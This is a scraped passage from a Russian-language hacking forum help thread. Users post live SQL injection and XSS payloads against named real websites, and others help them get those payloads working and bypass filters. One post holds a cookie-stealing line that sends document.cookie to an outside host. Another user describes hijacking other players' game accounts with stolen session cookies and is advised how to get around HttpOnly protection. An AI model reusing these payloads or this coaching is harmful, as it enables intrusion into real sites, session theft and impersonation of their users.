GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1
Cache-Control: no-cache
Referer:
http://*****.ru/wp-admin/post.php?action=edit&post={post-id} (http://*****.ru/wp-admin/post.php?action=edit&post=%7Bpost-id%7D)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: ******
Host: ****.ru
Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d
Accept-Encoding: gzip, deflate
---------------------------------------------------------------------------------------
robots.txt :
User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Allow: /doc/
Allow: /img/
Allow: /wp-content/uploads/
-------------------------------------------
Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.
HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )
влияние
Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.
Действия, чтобы Взять
См средство для решения.
Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).
средство
Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.
Внешние ссылки
Как это сделать ? .
-----------------------------------------------------------------------------------
Url
http://*******.ru/wp-login.php?action=lostpassword (http://helpset.ru/wp-login.php?action=lostpassword)
Identified Field Name user_login .
Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.
Это были важные поля, такие как "кредитная карта".
Влияние
Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.
Действия, чтобы Взять
Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.
Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.
Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.
Требуемые навыки для успешной эксплуатации
Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.
Внешние ссылки
Использование автозаполнения в HTML форм
П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .
-----------------------------------------------------------------------
Url
http://*******.ru/crossdomain.xml
Правила политики
Классификация Классификация
OWASP 2010 A6
OWASP 2013 А5
КВО 16
WASC 15
Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.
влияние
Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.
средство
Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.
Внешние ссылки
Рекомендации по использованию файла политики кросс-доменных для Flash Player
Crossdomain.xml приглашает Cross-Site Mayhem .
Как это сделать?
[/spoiler=Инфа которая поможет]
1. логины пароли идут не через SSL
2. у кук нет свойства httpOnly
3. crossdomain.xml: читать тут /threads/300591/ (https://antichat.live/threads/300591/)
djon said:
↑ (https://antichat.live/posts/3866466/)
-------------------------------------------------------------------------------------------------------------------------------------------------
Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to '
http://www.site.ru/p1/dk.php
' in /home/u941469589/public_html/upload.php on line 12
-------------------------------------------------------------------------------------------------------------------------------------------------
сама форма
-------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------
сам upload.php
-------------------------------------------------------------------------------------------------------------------------------------------------
1024*3*1024)
{
echo ("Размер файла превышает три мегабайта");
exit;
}
// Проверяем загружен ли файл
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
// Если файл загружен успешно, перемещаем его
// из временной директории в конечную
move_uploaded_file($_FILES["filename"]["tmp_name"], "
http://www.site.ru/p1/
".$_FILES["filename"]["name"]);
} else {
echo("Ошибка загрузки файла");
}
?>
-------------------------------------------------------------------------------------------------------------------------------------------------
путь должен быть локальным. у вас он есть в ошибке: /home/u941469589/public_html/
Помогите с выводом:
https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+order+by+9+--+
https://www.ibethel.org/payments/co...e_idr=144'+and+substring(@@version,1,1)=5+--+ (https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+and+substring(@@vers ion,1,1)=5+--+)
Br@!ns said:
↑ (https://antichat.live/posts/3866551/)
Помогите с выводом:
https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+order+by+9+--+
https://www.ibethel.org/payments/co...e_idr=144'+and+substring(@@version,1,1)=5+--+ (https://www.ibethel.org/payments/conference/index.php?conference_idr=144'+and+substring(@@vers ion,1,1)=5+--+)
в таких случаях через blind парсите select info from information_schema.processlist и смотрите, почему так и как можно получить вывод
ocheretko
10.07.2015, 03:02
Иньекция в переменную JavaScript
Здравствуйте, подскажите, почему не выполняется alert:
Code:
http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPo AFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKk Dxz3zZHTsR-u1N6ySOikXD104RF&search=1
Вывод:
Code:
'searchText': '\\'}; Alert(/Xss/);///*',
-----------------------------------------------------------------------------------
Похожая проблема у меня и вот с этой xss:
Code:
http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid=
Вывод:
Code:
pageLog["q"] = "\\\";alert();//";
ocheretko said:
↑ (https://antichat.live/posts/3866736/)
Иньекция в переменную JavaScript
Здравствуйте, подскажите, почему не выполняется alert:
Code:
http://0-99.net/?ac=2&slt=8&slr=1&lpt=1&query=\%27}%3B+alert%28%2Fxss%2F%29%3B%2F%2F%2F*&afdToken=CkAKEwjp7KW6k8_GAhVD4HIKHcuVA5gYAyAAULHPo AFosc-gAXE70B9vzKjYaJEBUbpy7KsxVDeRAXLdUtcEjNmhEhkAbTqKk Dxz3zZHTsR-u1N6ySOikXD104RF&search=1
Вывод:
Code:
'searchText': '\\'}; Alert(/Xss/);///*',
-----------------------------------------------------------------------------------
Похожая проблема у меня и вот с этой xss:
Code:
http://zhannei.baidu.com/cse/search?q=\%22%3Balert%28%29%3B%2F%2F&click=1&entry=1&s=3856084255718604899&nsid=
Вывод:
Code:
pageLog["q"] = "\\\";alert();//";
ну вот в этом случае
http://0-99.net/? (http://0-99.net/)
экранируется ' и вы не выходите за пределы значения параметра, соответственно все воспринимается как текст(значение параметра)
ocheretko
10.07.2015, 12:30
мне почему то думалось, что экранирующий слеш экранируется вторым слешом, и стает не экранированным
ocheretko said:
↑ (https://antichat.live/posts/3866824/)
мне почему то думалось, что экранирующий слеш экранируется вторым слешом, и стает не экранированным
все верно. однако alert() у вас с большой буквы, такой функции нет. а во втором случае вы как раз не выходите за пределы кавычек, там же их три - \\\"
http://www.sawadee.com/lib6/gmap/gmap3_aj.php?lg=en&q=tyfghfjjjjjjjgty') (http://www.sawadee.com/lib6/gmap/gmap3_aj.php?lg=en&q=tyfghfjjjjjjjgty%27%29)
Что нибудь интересненькое сделать можно?
Что это?
http://4cheat.ru/admincp/ единственное что там интересует дак токо это throttlepostsadmin.php (http://4cheat.ru/admincp/throttlepostsadmin.php) . При переходе кидает сюда http://4cheat.ru/admincp/throttlepostsadmin.php . Но там тупо постое окно . Что делать? .
Можно ли скрипт img = new Image(); img.src = "http://qoo.by/3aG? (http://qoo.by/3aG)"+document.cookie; укоротить до 45 символов ?
SaNDER said:
↑ (https://antichat.live/posts/3867184/)
Что это?
http://4cheat.ru/admincp/
единственное что там интересует дак токо это
throttlepostsadmin.php (http://4cheat.ru/admincp/throttlepostsadmin.php)
. При переходе кидает сюда
http://4cheat.ru/admincp/throttlepostsadmin.php
. Но там тупо постое окно . Что делать? .
Все просто,юзай вот эту ссылку - http://4cheat.ru/modcp/
djon said:
↑ (https://antichat.live/posts/3867373/)
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG? (http://qoo.by/3aG)
"+document.cookie; укоротить до 45 символов ?
Проще будет отредактировать максимальное количество вводимых символов в исходном коде.
Да,и js не запустится через сократитель ссылок
ocheretko
12.07.2015, 01:23
djon said:
↑ (https://antichat.live/posts/3867373/)
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG? (http://qoo.by/3aG)
"+document.cookie; укоротить до 45 символов ?
Подключите удаленный скрипт
На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д Как админ так хитро ограничил доступ?
Bragal said:
↑ (https://antichat.live/posts/3867418/)
На сервере все папки и файлы созданы из под одного юзера/группы, но в одни папки есть возможность записи, в другие нет (права одинаковые). У тех куда нет доступа, права не меняются с помощью chmod. Но рядом есть точно такие же папки, с тем же пользователем/правами и туда отлично добавляются файлы, меняются права и т.д
Как админ так хитро ограничил доступ?
Ничего хитрого, просто правильно расставлены ограничения.
OxoTnik said:
↑ (https://antichat.live/posts/3867419/)
Ничего хитрого, просто правильно расставлены ограничения.
И каким же образом? Реально обойти без получения рута?
djon said:
↑ (https://antichat.live/posts/3867373/)
Можно ли скрипт img = new Image(); img.src = "
http://qoo.by/3aG? (http://qoo.by/3aG)
"+document.cookie; укоротить до 45 символов ?
ocheretko said:
↑ (https://antichat.live/posts/3867402/)
Подключите удаленный скрипт
на всякий случай можно без кавычек и без http.
3ran said:
↑ (https://antichat.live/posts/3867377/)
Все просто,юзай вот эту ссылку -
http://4cheat.ru/modcp/
Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .
Привет всем,можно ли создать скрипт самоудаляющейся чтобы и теги его тоже удалялись?
nik1201 said:
↑ (https://antichat.live/posts/3867523/)
Привет всем,можно ли создать скрипт
самоудаляющейся чтобы и теги его тоже удалялись?
можно
ocheretko
13.07.2015, 00:35
Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
Code:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1
User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
ocheretko said:
↑ (https://antichat.live/posts/3867688/)
Странная ситуация, вставляю xss, и она не выполняется. Вот вывод:
Code:
alert(/olololkin2/);
Открываю "Просмотр исходного кода страницы", копирую весь код себе в файл, открываю его со своего домена - там xss срабатывает. Все манипуляции в Firefox
Code:
(Request-Line) GET /registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%2Folololkin2%2F)%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221 HTTP/1.1
User-Agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
В первый раз такое. Адрес:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%20type=%22text/javascript%22%3Ealert%28%2Folololkin2%2F%29%3B%3C/script%3E%3Cinput%20type=%22text%22%20value=%221
я пока сам не понял в чем дело, однако prompt() срабатывает:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
kingbeef
13.07.2015, 01:40
Xss есть, почитай js файлы, prompt работает
http://100ads.net/registration/?a=0&refererNickname=">prompt() (http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3Eprompt%28%29%3C/script%3E)
SaNDER said:
↑ (https://antichat.live/posts/3867487/)
Спасибо что ответил,но теперь вопрос другой,как обойти "это" . Ведь я не знаю логин и пароль модёра или админа . Что делать ? .
А ты думал достаточно просто найти админку?)
Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.
EoGeneo said:
↑ (https://antichat.live/posts/3867684/)
можно
Подскажи пжл как такой скрипт составить.
3ran said:
↑ (https://antichat.live/posts/3867727/)
А ты думал достаточно просто найти админку?)
Можешь теперь поставить её на брут,но шансов подобрать логин/пароль практически нет.
Ищи уязвимости,пробей какая версия движка там стоит,поищи сплоиты и тд.
vBulletin 3.8.6 . Сплоиты не могу найти и юзать я их тоже не умею .
http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8'
Можно что нибудь сделать?
Br@!ns said:
↑ (https://antichat.live/posts/3867909/)
http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8
'
Можно что нибудь сделать?
нет
ocheretko
13.07.2015, 23:54
Действительно срабатывает.
OxoTnik said:
↑ (https://antichat.live/posts/3867911/)
нет
Можно.
XSS уязвимость.
$url = "http://mobile.dmtc.com/index.php?video/replays/2010-08/08/8\'";
$referer = "\">alert(/antichat/);";
yarbabin said:
↑ (https://antichat.live/posts/3867697/)
я пока сам не понял в чем дело, однако prompt() срабатывает:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Csvg/onload=prompt%28/antichat/%29%3E
И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20o nerror=alert%28/1/%29%3E
RedFern.89
14.07.2015, 15:22
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Code:
http://navi-gaming.com/en/achievements?id[]=71
Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
ocheretko
15.07.2015, 00:49
frank said:
↑ (https://antichat.live/posts/3868134/)
И все-таки алерт тоже работает, но вот почему он не вызывается, хотя по всему должен , как записано у ocheretko я х.з. реврайтов каких то не увидел...
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cimg%20src=%271.jpg%27%20o nerror=alert%28/1/%29%3E
Вот так работает:
Code:
http://100ads.net/registration/?a=0&refererNickname=%22%3E%3Cscript%3EsetTimeout%28%22 alert%28123%29%22,1000%29;%3C/script%3E%3Ca%20x=%22
Связано это с тем, что происходит назначение window.alert=function(text){$.DF.Popup.open из файла http://100ads.net/scripts/df.js и в это же самое время мы вызываем функцию алерт. Если добавить таймаут все ок
RedFern.89 said:
↑ (https://antichat.live/posts/3868201/)
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Code:
http://navi-gaming.com/en/achievements?id[]=71
Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
Спрашивал с одного форума и вот что говорят,цитирую : "Он явно посчитал page за число и каким-то образом сделал из него -1, умножив затем на количество элементов, которые нужно достать, получив offset равный -7. Я полагаю, там (int) $_GET['page'], а дальше просто ошибка алгоритма, так что это не инъекция."
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?
ocheretko
16.07.2015, 14:11
RedFern.89 said:
↑ (https://antichat.live/posts/3868201/)
Помогите раскрутить, впервые сталкиваюсь, когда вывод не через кавычку
Code:
http://www.team-empire.org/materials/reports/?/materials/reports/=&page=\
Раскрутить не получилось, но XSS получилось.
Code:
xss http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,YWxlcnQoL1 hTU1BPU0VELyk=%3E
http://www.team-empire.org/?lang=en&a=%22%3Elol%3Cscript%20src=data:;base64,ZG9jdW1lbn QubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vZm9ydW0uYW50aWNo YXQucnUnOw==%3E
WAF только на формы, обход через Request_Uri
Root2 said:
↑ (https://antichat.live/posts/3868985/)
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?
если просто в hex? есть вывод?
yarbabin said:
↑ (https://antichat.live/posts/3869086/)
если просто в hex? есть вывод?
Нет тоже информация не отоброжается
kingbeef
17.07.2015, 22:57
Root2 said:
↑ (https://antichat.live/posts/3868985/)
Подскажите пожалуйста.
Есть колонка users, когда захожу в нее там одни запятые. Такого вида ,,,,,,,,, .Само сабой только они крупнее.
Пробывал так
unhex(hex(/*!group_concat*/(/*!users*/))) так долго думаем в итоге страничка вобще не грузится.
convert(group_concat(users)+using+ascii) пустое поле выдает.
CONVERT(group_concat(users)+USING+latin2) если так, то выдает - error Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (latin2_general_ci,IMPLICIT) for operation 'UNION'
Как быть?
concat_ws(0x3a,convert(users%20using%20utf8))
А так ?
kingbeef said:
↑ (https://antichat.live/posts/3869669/)
concat_ws(0x3a,convert(users%20using%20utf8))
А так ?
Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?
kingbeef
18.07.2015, 14:52
Root2 said:
↑ (https://antichat.live/posts/3869763/)
Да не так я пробовал. Результата нет. Запятые пропадают и....не выводится ничего. Может там информации вобще нет?
Покажи ссылку
Помогите, попал в тупик.
Вот страница - http://www.ezar.ru/?a=reg
Поле "логин" уязвимое, посылается форма через POST на http://www.ezar.ru/prereg.php , там вылетает Warning: mysql_num_rows()
Что делать дальше? Попробовал подбирать поля, подменяя запросы через Burp, но что то нифига не получается.
ocheretko
19.07.2015, 01:21
Пока мы попытаемся помочь Вам из SqlInj, можете поиграться с ихними XSS:
Code:
1) http://www.ezar.ru/testd.php?domain=ezar.ru&nick=
2) url: http://www.ezar.ru/prereg.php
POST: tarif=10&konstrukotor=yes&login=11&nick2=%3Cscript%3Ealert%28%2fXSSPOSED%2f%29%3B%3C% 2fscript%3E&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK
Чтобы не мучится с POST, работайте так:
Code:
http://www.ezar.ru/prereg.php?tarif=10&konstrukotor=yes&nick2=nick&domain2=ezar.ru&nick=&domain=ru&dom=off&rname=111&mailto=111&icq=111&phone=111&OK=OK&login='
mazaxaka
19.07.2015, 14:19
подскажите как юзнуть ету уязвимость
Code:
PHP Object Injection
Userinput reaches sensitive sink. For more information, press the help icon on the left side.
12: unserialize $data = unserialize($compressed);
9: $compressed = base64_decode($cookieData);
8: $cookieData = str_replace('#', '+', $cookieData);
6: $cookieData = $_COOKIE['___389_shR7_ZeE'];
изучите данный материал для начала
https://rdot.org/forum/showthread.php?t=950
http://raz0r.name/tag/unserialize/
palec2006 said:
↑ (https://antichat.live/posts/3870226/)
чёт не могу дупля отстрелить
Code:
POST /search/ HTTP/1.1
Content-Length: 81
Host: www.fortun.ru
Connection: Keep-alive
Accept: */*
articles=1&news=1&pages=1&query='and extractvalue(1,concat(0x3a,(version())))and'
select фильтрует, всё пропало?
Code:
POST /calc/save_form/ HTTP/1.1
Host: www.fortun.ru
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.fortun.ru/calc/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
element%5B28|extractvalue(1,concat(0x3a,(select version())))%5D=on
Привет всем,нашел атаку на сайте при создание ника можно в поле ника вписывать разные скрипты и все робит,допустим вписываю ява скрипт алерт и сообщение вылазит везде где отображается мой ник и еще когда захожу в админ панель и там скрипт тоже исполняется http://s1.sendimage.me/qGfEkvIk.png но собственно сам вопрос как можно взломать сайт при поможи этого?
ocheretko
22.07.2015, 04:22
Как пример - почитайте здесь /threads/395565/ (https://antichat.live/threads/395565/)
Да там куки почему то на сайте не подмениваются
ocheretko
22.07.2015, 13:46
Поставьте вопрос более конкретно, с описанием всех Ваших действий
Привет всем,вот мне приходят куки с форума игры.
------------------------------------------------------------------------------------------------------
w2vL_cca8_lastvisit=1437004847;
w2vL_cca8_nofavfid=1;
PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;
w2vL_cca8_lastcheckfeed=21728%7C1437560824;
w2vL_cca8_visitedfid=45D46D53D2;
w2vL_cca8_viewid=tid_6189;
w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663;
w2vL_cca8_smile=1D1;
__zlcmid=Vienkp6pQjrijA;
_ga=GA1.2.956537111.1436906922F;
w2vL_cca8_lastact=1437566946%09forum.php%09;
w2vL_cca8_onlineusernum=59;
w2vL_cca8_sid=ro6N6g
------------------------------------------------------------------------------------------------------
Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.
------------------------------------------------------------------------------------------------------
1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
2)_ga=GA1.2.956537111.1436906922F
------------------------------------------------------------------------------------------------------
Но когда заменяю на форуме ,куки не подмениваются.
------------------------------------------------------------------------------------------------------
Сайт выглядит такого типа www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php)
На www.site.ru (http://www.site.ru) расположен профиль игрока,тут короче выбираешь сервер и играешь.
На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.
В чем может быть проблема?
nik1201 said:
↑ (https://antichat.live/posts/3871409/)
Привет всем,вот мне приходят куки с форума игры.
------------------------------------------------------------------------------------------------------
w2vL_cca8_lastvisit=1437004847;
w2vL_cca8_nofavfid=1;
PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;
w2vL_cca8_lastcheckfeed=21728%7C1437560824;
w2vL_cca8_visitedfid=45D46D53D2;
w2vL_cca8_viewid=tid_6189;
w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663;
w2vL_cca8_smile=1D1;
__zlcmid=Vienkp6pQjrijA;
_ga=GA1.2.956537111.1436906922F;
w2vL_cca8_lastact=1437566946%09forum.php%09;
w2vL_cca8_onlineusernum=59;
w2vL_cca8_sid=ro6N6g
------------------------------------------------------------------------------------------------------
Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса.
------------------------------------------------------------------------------------------------------
1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
2)_ga=GA1.2.956537111.1436906922F
------------------------------------------------------------------------------------------------------
Но когда заменяю на форуме ,куки не подмениваются.
------------------------------------------------------------------------------------------------------
Сайт выглядит такого типа www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php)
На www.site.ru (http://www.site.ru) расположен профиль игрока,тут короче выбираешь сервер и играешь.
На /forum/forum.php расположен мой ява скрипт но подмена куки почему то тут не робит.
В чем может быть проблема?
Обычно с тем что там разные профили при регистрации, разные движки и базы данных.
Там на форуме на моих куках есть еще 2 строчки которые сниффер не ловит.
------------------------------------------------------------------------------------------------------
w2vL_cca8_auth
and
w2vL_cca8_saltkey
------------------------------------------------------------------------------------------------------
Почему эти стрчки не идут,хотя скрипт то стоит на /forum/forum.php а не на www.site.ru? (http://www.site.ru)
И что можно сделать что бы они шли?
nik1201 said:
↑ (https://antichat.live/posts/3871456/)
Там на форуме на моих куках есть еще 2 строчки которые сниффер не ловит.
------------------------------------------------------------------------------------------------------
w2vL_cca8_auth
and
w2vL_cca8_saltkey
------------------------------------------------------------------------------------------------------
Почему эти стрчки не идут,хотя скрипт то стоит на /forum/forum.php а не на www.site.ru? (http://www.site.ru)
И что можно сделать что бы они шли?
может у них флаг httponly?
yarbabin said:
↑ (https://antichat.live/posts/3871466/)
может у них флаг httponly?
я так же подумал в начале, но ник1201 пишет о снифере, а если он подразумевает под снифером все-таки снифер, а не скрипт с document.cookie, то там будут видны все куки... хотя, фраза ко мне приходят... я запутался
На сайте www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php) у меня вшит скрипт и с сайта www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php) мне отправляются чужие куки на мой снифер,и в log.txt у меня хранятся чужие куки вида
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
w2vL_cca8_lastvisit=1437004847;
w2vL_cca8_nofavfid=1;
PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;
w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;
w2vL_cca8_lastcheckfeed=21728%7C1437560824;
w2vL_cca8_visitedfid=45D46D53D2;
w2vL_cca8_viewid=tid_6189;
w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663; ==>Это чужие Cookie
w2vL_cca8_smile=1D1;
__zlcmid=Vienkp6pQjrijA;
_ga=GA1.2.956537111.1436906922F;
w2vL_cca8_lastact=1437566946%09forum.php%09;
w2vL_cca8_onlineusernum=59;
w2vL_cca8_sid=ro6N6g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса (для подмены куков использую расширение для оперы EditThisCookie) на www.site.ru (http://www.site.ru/forum/forum.php)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3
2)_ga=GA1.2.956537111.1436906922F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
А на форуме (www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php)) у меня не получается подменить куки,даже если я меняю все строчки.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Для проверки я зашел на форум под своим логином и при помощи расширения EditThisCookie посмотрел как выглядят свои куки,и там были еще строчки котрые снифер не ловит
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
w2vL_cca8_auth
w2vL_cca8_saltkey
Все я понял,для авторизации на форуме нужны 2 строчки вот эти
w2vL_cca8_auth
w2vL_cca8_saltkey
но почему то снифер их не ловит,в чем может быть проблема?
посмотрите какие флаги установлены для этих кук
ocheretko
23.07.2015, 00:51
yarbabin выкладывал ссылку, https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
yarbabin said:
↑ (https://antichat.live/posts/3871611/)
посмотрите какие флаги установлены для этих кук
На куках w2vL_cca8_auth установлено "session" и "httpOnly" а на w2vL_cca8_saltkey "httpOnly"
nik1201 said:
↑ (https://antichat.live/posts/3871692/)
На куках w2vL_cca8_auth установлено "session" и "httpOnly" а на w2vL_cca8_saltkey "httpOnly"
для JS они недоступны, только для сервера. в этом все и дело. придумывайте другой вектор атаки
nik1201 said:
↑ (https://antichat.live/posts/3871798/)
А обойти можно httponly?
на некоторых версиях apache можно: http://www.securityfocus.com/bid/51706/exploit
Почему вчера я мог заменить куки а сегодня почему то не получается?
nik1201 said:
↑ (https://antichat.live/posts/3871798/)
А обойти можно httponly?
Есть такая узявимость как HTTP Only Cookie Disclosure. Я её ещё называю Cookie Bomb.
Работает так:
1) Необходимо установить специальную cookie, название которой располагается ниже cookie, которую необходимо скомпрометировать, при условии упорядочивания их в алфавитном порядке.
